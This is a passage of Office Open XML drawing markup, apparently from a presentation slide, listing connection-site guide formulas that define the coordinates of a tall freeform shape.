              <a:gd name="connsiteX150" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY150" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY151" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY152" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY153" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY154" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 263226 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY156" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX157" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY157" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX158" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY158" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX159" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY159" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX160" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY160" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX161" fmla="*/ 204576 w 1605470"/>
              <a:gd name="connsiteY161" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX162" fmla="*/ 219064 w 1605470"/>
              <a:gd name="connsiteY162" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX163" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY163" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX164" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY164" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX165" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY165" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX166" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY166" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX167" fmla="*/ 167079 w 1605470"/>
              <a:gd name="connsiteY167" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX168" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY168" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX169" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY169" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX170" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY170" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX171" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY171" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX172" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY17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56542 w 1605470"/>
              <a:gd name="connsiteY70" fmla="*/ 4350346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46785 w 1605470"/>
              <a:gd name="connsiteY135" fmla="*/ 1903212 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 436547 w 1605470"/>
              <a:gd name="connsiteY136" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 390346 w 1605470"/>
              <a:gd name="connsiteY137" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 362657 w 1605470"/>
              <a:gd name="connsiteY138" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 361783 w 1605470"/>
              <a:gd name="connsiteY139" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 342578 w 1605470"/>
              <a:gd name="connsiteY140" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 355658 w 1605470"/>
              <a:gd name="connsiteY141" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 348400 w 1605470"/>
              <a:gd name="connsiteY142" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 334485 w 1605470"/>
              <a:gd name="connsiteY143" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY144" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY145" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY146" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY147" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY148" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 318989 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY150" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY151" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY152" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY153" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY154" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 263226 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY156" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX157" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY157" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX158" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY158" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX159" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY159" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX160" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY160" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX161" fmla="*/ 204576 w 1605470"/>
              <a:gd name="connsiteY161" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX162" fmla="*/ 219064 w 1605470"/>
              <a:gd name="connsiteY162" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX163" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY163" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX164" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY164" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX165" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY165" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX166" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY166" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX167" fmla="*/ 167079 w 1605470"/>
              <a:gd name="connsiteY167" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX168" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY168" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX169" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY169" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX170" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY170" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX171" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY171" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX172" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY17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46785 w 1605470"/>
              <a:gd name="connsiteY135" fmla="*/ 1903212 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 436547 w 1605470"/>
              <a:gd name="connsiteY136" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 390346 w 1605470"/>
              <a:gd name="connsiteY137" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 362657 w 1605470"/>
              <a:gd name="connsiteY138" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 361783 w 1605470"/>
              <a:gd name="connsiteY139" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 342578 w 1605470"/>
              <a:gd name="connsiteY140" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 355658 w 1605470"/>
              <a:gd name="connsiteY141" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 348400 w 1605470"/>
              <a:gd name="connsiteY142" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 334485 w 1605470"/>
              <a:gd name="connsiteY143" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY144" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY145" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY146" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY147" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY148" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 318989 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY150" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY151" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY152" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY153" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY154" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 263226 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY156" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX157" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY157" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX158" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY158" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX159" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY159" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX160" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY160" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX161" fmla="*/ 204576 w 1605470"/>
              <a:gd name="connsiteY161" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX162" fmla="*/ 219064 w 1605470"/>
              <a:gd name="connsiteY162" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX163" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY163" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX164" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY164" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX165" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY165" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX166" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY166" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX167" fmla="*/ 167079 w 1605470"/>
              <a:gd name="connsiteY167" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX168" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY168" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX169" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY169" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX170" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY170" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX171" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY171" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX172" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY17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504338 w 1605470"/>
              <a:gd name="connsiteY129" fmla="*/ 2195378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37964 w 1605470"/>
              <a:gd name="connsiteY61" fmla="*/ 4858827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504338 w 1605470"/>
              <a:gd name="connsiteY129" fmla="*/ 2195378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44206 w 1605470"/>
              <a:gd name="connsiteY39" fmla="*/ 5641620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37964 w 1605470"/>
              <a:gd name="connsiteY61" fmla="*/ 4858827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504338 w 1605470"/>
              <a:gd name="connsiteY129" fmla="*/ 2195378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44206 w 1605470"/>
              <a:gd name="connsiteY39" fmla="*/ 5641620 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 591557 w 1605470"/>
              <a:gd name="connsiteY40" fmla="*/ 5476393 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 622750 w 1605470"/>
              <a:gd name="connsiteY41" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 638731 w 1605470"/>
              <a:gd name="connsiteY42" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 672224 w 1605470"/>
              <a:gd name="connsiteY43" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 681823 w 1605470"/>
              <a:gd name="connsiteY44" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 693049 w 1605470"/>
              <a:gd name="connsiteY45" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 694069 w 1605470"/>
              <a:gd name="connsiteY46" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 701410 w 1605470"/>
              <a:gd name="connsiteY47" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 704713 w 1605470"/>
              <a:gd name="connsiteY48" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 705697 w 1605470"/>
              <a:gd name="connsiteY49" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 701331 w 1605470"/>
              <a:gd name="connsiteY50" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 708008 w 1605470"/>
              <a:gd name="connsiteY51" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 704941 w 1605470"/>
              <a:gd name="connsiteY52" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 711771 w 1605470"/>
              <a:gd name="connsiteY53" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 718807 w 1605470"/>
              <a:gd name="connsiteY54" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 721538 w 1605470"/>
              <a:gd name="connsiteY55" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 718242 w 1605470"/>
              <a:gd name="connsiteY56" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 719796 w 1605470"/>
              <a:gd name="connsiteY57" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 726705 w 1605470"/>
              <a:gd name="connsiteY58" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 722561 w 1605470"/>
              <a:gd name="connsiteY59" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 737964 w 1605470"/>
              <a:gd name="connsiteY60" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 732118 w 1605470"/>
              <a:gd name="connsiteY61" fmla="*/ 4801535 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 739787 w 1605470"/>
              <a:gd name="connsiteY62" fmla="*/ 4797794 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 741081 w 1605470"/>
              <a:gd name="connsiteY63" fmla="*/ 4784526 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 742865 w 1605470"/>
              <a:gd name="connsiteY64" fmla="*/ 4781211 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 751652 w 1605470"/>
              <a:gd name="connsiteY65" fmla="*/ 4761984 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 747700 w 1605470"/>
              <a:gd name="connsiteY66" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 743180 w 1605470"/>
              <a:gd name="connsiteY67" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 738263 w 1605470"/>
              <a:gd name="connsiteY68" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 734828 w 1605470"/>
              <a:gd name="connsiteY69" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 715481 w 1605470"/>
              <a:gd name="connsiteY70" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 719554 w 1605470"/>
              <a:gd name="connsiteY71" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 704810 w 1605470"/>
              <a:gd name="connsiteY72" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 705959 w 1605470"/>
              <a:gd name="connsiteY73" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 704535 w 1605470"/>
              <a:gd name="connsiteY74" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 700443 w 1605470"/>
              <a:gd name="connsiteY75" fmla="*/ 4010511 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 698282 w 1605470"/>
              <a:gd name="connsiteY76" fmla="*/ 3998331 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 690830 w 1605470"/>
              <a:gd name="connsiteY77" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 692428 w 1605470"/>
              <a:gd name="connsiteY78" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 685850 w 1605470"/>
              <a:gd name="connsiteY79" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 687181 w 1605470"/>
              <a:gd name="connsiteY80" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 691535 w 1605470"/>
              <a:gd name="connsiteY81" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 696613 w 1605470"/>
              <a:gd name="connsiteY82" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 719207 w 1605470"/>
              <a:gd name="connsiteY83" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 718632 w 1605470"/>
              <a:gd name="connsiteY84" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 718939 w 1605470"/>
              <a:gd name="connsiteY85" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 718966 w 1605470"/>
              <a:gd name="connsiteY86" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 717581 w 1605470"/>
              <a:gd name="connsiteY87" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 716465 w 1605470"/>
              <a:gd name="connsiteY88" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 718198 w 1605470"/>
              <a:gd name="connsiteY89" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 721941 w 1605470"/>
              <a:gd name="connsiteY90" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 721407 w 1605470"/>
              <a:gd name="connsiteY91" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 730103 w 1605470"/>
              <a:gd name="connsiteY92" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 737449 w 1605470"/>
              <a:gd name="connsiteY93" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 736745 w 1605470"/>
              <a:gd name="connsiteY94" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 740188 w 1605470"/>
              <a:gd name="connsiteY95" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 747726 w 1605470"/>
              <a:gd name="connsiteY96" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 774383 w 1605470"/>
              <a:gd name="connsiteY97" fmla="*/ 3381564 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 774870 w 1605470"/>
              <a:gd name="connsiteY98" fmla="*/ 3375761 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 770510 w 1605470"/>
              <a:gd name="connsiteY99" fmla="*/ 3361844 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 767933 w 1605470"/>
              <a:gd name="connsiteY100" fmla="*/ 3356929 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 766158 w 1605470"/>
              <a:gd name="connsiteY101" fmla="*/ 3349058 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 766414 w 1605470"/>
              <a:gd name="connsiteY102" fmla="*/ 3348763 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 764166 w 1605470"/>
              <a:gd name="connsiteY103" fmla="*/ 3341588 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 749397 w 1605470"/>
              <a:gd name="connsiteY104" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 766960 w 1605470"/>
              <a:gd name="connsiteY105" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 767385 w 1605470"/>
              <a:gd name="connsiteY106" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 769208 w 1605470"/>
              <a:gd name="connsiteY107" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 770350 w 1605470"/>
              <a:gd name="connsiteY108" fmla="*/ 3216125 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 756043 w 1605470"/>
              <a:gd name="connsiteY109" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 756544 w 1605470"/>
              <a:gd name="connsiteY110" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 744144 w 1605470"/>
              <a:gd name="connsiteY111" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 739378 w 1605470"/>
              <a:gd name="connsiteY112" fmla="*/ 3147669 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 734648 w 1605470"/>
              <a:gd name="connsiteY113" fmla="*/ 3145733 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 729329 w 1605470"/>
              <a:gd name="connsiteY114" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 729994 w 1605470"/>
              <a:gd name="connsiteY115" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 720862 w 1605470"/>
              <a:gd name="connsiteY116" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 707471 w 1605470"/>
              <a:gd name="connsiteY117" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 680201 w 1605470"/>
              <a:gd name="connsiteY118" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 622815 w 1605470"/>
              <a:gd name="connsiteY119" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 571733 w 1605470"/>
              <a:gd name="connsiteY120" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 551827 w 1605470"/>
              <a:gd name="connsiteY121" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 542550 w 1605470"/>
              <a:gd name="connsiteY122" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 529511 w 1605470"/>
              <a:gd name="connsiteY123" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 528878 w 1605470"/>
              <a:gd name="connsiteY124" fmla="*/ 2408971 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 535510 w 1605470"/>
              <a:gd name="connsiteY125" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 538122 w 1605470"/>
              <a:gd name="connsiteY126" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 514451 w 1605470"/>
              <a:gd name="connsiteY127" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 504338 w 1605470"/>
              <a:gd name="connsiteY128" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 488555 w 1605470"/>
              <a:gd name="connsiteY129" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 486013 w 1605470"/>
              <a:gd name="connsiteY130" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 487006 w 1605470"/>
              <a:gd name="connsiteY131" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 478812 w 1605470"/>
              <a:gd name="connsiteY132" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 459990 w 1605470"/>
              <a:gd name="connsiteY133" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 436547 w 1605470"/>
              <a:gd name="connsiteY134" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 390346 w 1605470"/>
              <a:gd name="connsiteY135" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 362657 w 1605470"/>
              <a:gd name="connsiteY136" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 361783 w 1605470"/>
              <a:gd name="connsiteY137" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 342578 w 1605470"/>
              <a:gd name="connsiteY138" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 355658 w 1605470"/>
              <a:gd name="connsiteY139" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 348400 w 1605470"/>
              <a:gd name="connsiteY140" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 334485 w 1605470"/>
              <a:gd name="connsiteY141" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY142" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY143" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY144" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY145" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY146" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 318989 w 1605470"/>
              <a:gd name="connsiteY147" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY148" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 915925 h 6858000"/>
